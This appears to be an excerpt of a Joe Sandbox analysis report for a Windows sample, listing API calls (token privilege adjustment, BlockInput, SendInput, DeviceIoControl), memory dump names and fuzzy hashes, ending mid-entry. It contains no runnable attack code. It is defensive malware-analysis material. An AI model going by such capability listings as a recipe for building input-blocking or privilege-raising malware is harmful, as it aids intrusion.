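Feeding the whole report's "APIs" bullets through `triage` gives a per-function capability map that is quicker to scan than the raw hashes; the IOCTL decoder is the piece to reach for whenever a report shows DeviceIoControl with a literal code, since the device type and function number identify the request without needing the symbolic name.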
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C7D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C7D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: c7855c093ac968e1313c3222559917f35219d161852a5147b9f8f63ebaa309cf
                                                                                      • Instruction ID: eed8662c7cf55e8935ce41db6e9080b8e44a9254a1029fd949942f90c9a45d6f
                                                                                      • Opcode Fuzzy Hash: c7855c093ac968e1313c3222559917f35219d161852a5147b9f8f63ebaa309cf
                                                                                      • Instruction Fuzzy Hash: F6115E75E05228BFDB108F95DC85FAFBBBCEB45B60F108515F918E7290D6704A058BA1
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C7168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C716A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 00C716B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: bff7a0d9a5cb832bfb21b234867fe59d512c323820def197e7ea3a00f5fd32e8
                                                                                      • Instruction ID: 898343ee388d655ec6f12f1e0bc00277d922201809b093cc4f8b6086b2058117
                                                                                      • Opcode Fuzzy Hash: bff7a0d9a5cb832bfb21b234867fe59d512c323820def197e7ea3a00f5fd32e8
                                                                                      • Instruction Fuzzy Hash: B4F0F47195030DFBDB00DFE4DC89AAEBBBCEB08604F508565E901E2181E774AA448A50
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000,?,00C428E9), ref: 00C34D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000,?,00C428E9), ref: 00C34D10
                                                                                      • ExitProcess.KERNEL32 ref: 00C34D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: e75662ccd4da236ffea0e86434a227be8e05ef92e74809bf54268809dfef3741
                                                                                      • Instruction ID: 429575f8c5f58df28a44c2bd8217250b843c43b2bb9ab45a6a6a540bd2adab8f
                                                                                      • Opcode Fuzzy Hash: e75662ccd4da236ffea0e86434a227be8e05ef92e74809bf54268809dfef3741
                                                                                      • Instruction Fuzzy Hash: 20E0B631011148ABCF15AF54DD49B9D3B79FB42795F104014FD159B132CB39EE42DA80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: bd8974faab7658b2fbd098f7e10ba7f11304eb1fbc03d0ba6edc16c6d6038988
                                                                                      • Instruction ID: aa57329da45b31abb9fd35af3afd230cff4767010fdb172cf06c7ec3e17eb33b
                                                                                      • Opcode Fuzzy Hash: bd8974faab7658b2fbd098f7e10ba7f11304eb1fbc03d0ba6edc16c6d6038988
                                                                                      • Instruction Fuzzy Hash: 12412676901219ABCB249FB9CC89EFB77B8FB84314F504269F915D71A0E6709E81CB50
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00C6D28C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: be7f165c43e8ae9649a83f4ff9f4f0fe053e62017de12ad1a16b1745a99e20e0
                                                                                      • Instruction ID: cbc79ea8dae363fc5df70ce96358180b562a8a6ce589af106061b0a5be7de481
                                                                                      • Opcode Fuzzy Hash: be7f165c43e8ae9649a83f4ff9f4f0fe053e62017de12ad1a16b1745a99e20e0
                                                                                      • Instruction Fuzzy Hash: DBD0CAB480116DEACBA0CBA0ECC8EDEB7BCBB14309F100292F106A2000DB309A488F20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: 8894962b4598f3fe915d4ca39a0204fc49701403902d9fcb38243183b20ce92a
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: F2021D72E102199BDF14DFA9D8C06ADFBF1EF48314F258169D829F7384D731AA418B94
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C86918
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C86961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: eb4d9e66360b8a78f79573fa8fb2ba595ac58953673f747a709655c2c9e33bac
                                                                                      • Instruction ID: 5a1de72ba758379a097a29bf80ed1de3cb38a48bdaacd57cb4514d162d054e32
                                                                                      • Opcode Fuzzy Hash: eb4d9e66360b8a78f79573fa8fb2ba595ac58953673f747a709655c2c9e33bac
                                                                                      • Instruction Fuzzy Hash: 1B117C316042109FC710DF69D488A1ABBE5EF85328F14C699E4698B7A2CB30EC45CB91
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C94891,?,?,00000035,?), ref: 00C837E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C94891,?,?,00000035,?), ref: 00C837F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: af410c4e8040afcf625adf4c5ab35dfc35b5a2488a3c27a02348396bad5d8947
                                                                                      • Instruction ID: cb73d12b166f1e19a0a27626f7a8fe1f3b4cce4565741aed640d70d5c22dd2ea
                                                                                      • Opcode Fuzzy Hash: af410c4e8040afcf625adf4c5ab35dfc35b5a2488a3c27a02348396bad5d8947
                                                                                      • Instruction Fuzzy Hash: 38F0EC707052142AD71067664C8DFDB369DDFC5B65F000275F505D32D1D9609944C7B0
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C7B25D
                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C7B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: bc23a3b532b469837c1af17165f28f159e5f4f61b62308a9e8e3b725311218c3
                                                                                      • Instruction ID: e16f186d3bd8d0b67185c778b6b6608db78b5e7884a08d45f57ec85398ce212b
                                                                                      • Opcode Fuzzy Hash: bc23a3b532b469837c1af17165f28f159e5f4f61b62308a9e8e3b725311218c3
                                                                                      • Instruction Fuzzy Hash: 63F0177180428EABDB059FA1C806BBE7BB4FF09309F00800AF965A61A2C37986119F94
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C711FC), ref: 00C710D4
                                                                                      • CloseHandle.KERNEL32(?,?,00C711FC), ref: 00C710E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: 5b6158676e33cf62952987cc4be51bd718f20151cdf355f5a5b3dfe8f4a9882e
                                                                                      • Instruction ID: 1bf079d85bd97b1309aa5e3218651f9687a906fe9dbff86da87f3f35ff50a1ac
                                                                                      • Opcode Fuzzy Hash: 5b6158676e33cf62952987cc4be51bd718f20151cdf355f5a5b3dfe8f4a9882e
                                                                                      • Instruction Fuzzy Hash: EEE04F32004610AEE7252B15FC05FB777A9EF04320F14882DF4A6814B1DB626C90EB10
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00C60C40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 9e16b3d46dee8a303e3402b7d4e5059fe251cbb82d063a37fdf5ac1c857772c4
                                                                                      • Instruction ID: 5a7f2ca92053cd82ee79e8c1a6cdb1a61c29ffaf67184bf4616391ccaec4885d
                                                                                      • Opcode Fuzzy Hash: 9e16b3d46dee8a303e3402b7d4e5059fe251cbb82d063a37fdf5ac1c857772c4
                                                                                      • Instruction Fuzzy Hash: DB32AE30940218DBCF24DF94D8D1AEEB7B5FF06304F248059F816AB292D735AE86EB51
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C46766,?,?,00000008,?,?,00C4FEFE,00000000), ref: 00C46998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 6f7e0484133966bb2604fb18c379eb1b12d0b42764fbd87d34a67e041b2ec68f
                                                                                      • Instruction ID: 0925d2ffd9d8a33951c5a309b2772b0767da1d4e6bad6e5f0d2a04d9e028f324
                                                                                      • Opcode Fuzzy Hash: 6f7e0484133966bb2604fb18c379eb1b12d0b42764fbd87d34a67e041b2ec68f
                                                                                      • Instruction Fuzzy Hash: 2EB14C316106089FD715CF28C486B657BE0FF46368F258658E8E9CF2E6C335EA91CB41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 3196eb8806bcf009b612c7e23ca401bd271dd0cea73bfd2cca6050edd52228d1
                                                                                      • Instruction ID: dfe0c99ed0e16f95f08f602380d8ce1aae399e6a3624bfc857e2ede2558a2488
                                                                                      • Opcode Fuzzy Hash: 3196eb8806bcf009b612c7e23ca401bd271dd0cea73bfd2cca6050edd52228d1
                                                                                      • Instruction Fuzzy Hash: 91127E71D002299BCB24DF59D8806EEB7F5FF48310F1481AAE859EB251DB309E85DF90
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 00C8EABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: 2726b5a806b37ab9c7252284116c77cd4e646d98368d6a27c337248c587e7782
                                                                                      • Instruction ID: 66d9ef0073953bd7545f71ba37ef35e0037187c3a25581f5ec9156968ab65642
                                                                                      • Opcode Fuzzy Hash: 2726b5a806b37ab9c7252284116c77cd4e646d98368d6a27c337248c587e7782
                                                                                      • Instruction Fuzzy Hash: 86E01A31200204AFC710EF5AD844E9ABBE9AF99764F008416FC49C7351DA70E881AB90
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00C303EE), ref: 00C309DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: fe9d2f5e2414aa138904cbd89e183879a4ac44fa8df305a4ccf03c403a4390aa
                                                                                      • Instruction ID: bcd5e5b7ac518b4d10a9a3abc5cdc8a01e7340b3ceedb4279bfa92d12fd79366
                                                                                      • Opcode Fuzzy Hash: fe9d2f5e2414aa138904cbd89e183879a4ac44fa8df305a4ccf03c403a4390aa
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 3fb99e9943a86ff3dcaf643888caa725ae425c106688d0badbddf5a3c03b1c09
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 345168F163C7456BDF388569895EBBE63D99B06300F180B09E8A2EB2C2C615DF05E353
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f13ecc687bd88667465eb24ecf397931a71fcb07ff248d553a8dbc6d7dfc077
                                                                                      • Instruction ID: d2077ef76cba0b0e5c03431ffe619f395ff722b22e1f6bb21134b3159823f6f7
                                                                                      • Opcode Fuzzy Hash: 8f13ecc687bd88667465eb24ecf397931a71fcb07ff248d553a8dbc6d7dfc077
                                                                                      • Instruction Fuzzy Hash: BC321332D29F414DDB239635CC2233AA649BFB73C5F15D737E82AB5AA5EB29C5834100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a89413fba1c3d778ee3237d6e3c89706a67a1afe8d13432c3e3442958e0eebbc
                                                                                      • Instruction ID: eb0ebfad99496317d305605af0bc04efb408d1450eec7ecf53559cd84f238466
                                                                                      • Opcode Fuzzy Hash: a89413fba1c3d778ee3237d6e3c89706a67a1afe8d13432c3e3442958e0eebbc
                                                                                      • Instruction Fuzzy Hash: 50320531A042658BCF38CF69D8D467D7BA1EB45300F28856BD4EADB692D234DF81EB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
